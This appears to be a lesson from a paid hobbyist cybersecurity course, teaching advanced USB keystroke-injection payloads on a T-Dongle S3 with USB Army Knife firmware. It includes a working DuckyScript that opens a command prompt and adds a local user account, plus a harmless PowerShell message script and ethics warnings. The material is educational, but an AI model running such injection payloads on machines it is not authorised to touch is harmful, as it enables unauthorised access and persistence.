Month 5 Box - Cyber Security

Lesson 6 - Advanced USB Ducky Payloads

Lesson 6: Advanced Payloads with T-Dongle (USB Army Knife)


Now that you’ve mastered the basics of USB HID injection, this lesson dives deeper into advanced payloads using the T-Dongle S3 and USB Army Knife firmware. You’ll learn how attackers use these techniques to execute system-level commands—and why it's so important to understand them from a defensive and ethical perspective.


🎯 What You’ll Learn:


By the end of this session, you will:


  • Write advanced HID payloads that trigger command-line and PowerShell actions
  • Simulate automated phishing-like payloads (for educational use only)
  • Safely test and clean up payloads on your own offline system
  • Understand the real-world risks of HID tools and your responsibilities as an ethical hacker


⚙️ Step 1 – Advanced HID Payload Capabilities


Here are examples of actions HID injection tools can perform within seconds:


  • Create a new local user with net user
  • Launch PowerShell and execute simple scripts
  • Open a web browser to a targeted URL to simulate phishing behavior


🧠 Reminder: All payloads must be used only on machines you own or have permission to test on.


These examples are often used in real-world attacks, from ransomware delivery to data exfiltration. Understanding these techniques gives you insight into how to defend against them.


🧪 Hands-On Activity: Educational Payload


Let’s build and test a real example on your machine:


GUI r

DELAY 500

STRING cmd

ENTER

DELAY 500

STRING net user testuser password123 /add

ENTER


Upload this script using the USB Army Knife web interface, then run it on your device.


To clean up afterward, run:


net user testuser /delete


💡 Bonus Activity:


Try building a PowerShell script that displays a simple message:


GUI r

DELAY 500

STRING powershell

ENTER

DELAY 500

STRING Write-Host 'Hello from T-Dongle!'

ENTER


Use this to explore scripting safely and learn how different command shells respond to HID automation.


⚖️ Legal Note (Part 2):


This lesson demonstrates tools that could be used maliciously—but you are learning to use them responsibly.


Never deploy these payloads in school, work, or public environments.

Never test on systems you don’t fully control.

Always clean up after testing and keep your activities ethical and legal.

🔒 The video includes real-world headlines about misused HID attacks with an on-screen warning:


“This is why we learn responsibly. DO NOT misuse this knowledge.”


📚 Homework Assignment:


  • Create your own safe, advanced payload. Example ideas:
  • Open Notepad, Calculator, and a website in sequence
  • Launch a shell and print system info
  • Document what it does and why it works
  • Share your best creation in the #advanced-payloads thread on Discord


✅ By the End of This Lesson, You’ll Have:


  • Understood how attackers use HID automation to manipulate systems
  • Written, deployed, and cleaned up an advanced payload
  • Strengthened your understanding of how to test and defend responsibly


In Lesson 7, we’ll move into wireless hacking territory with the T-Embed (Flipper clone)—opening up exciting learning opportunities around RFID, Bluetooth, and more.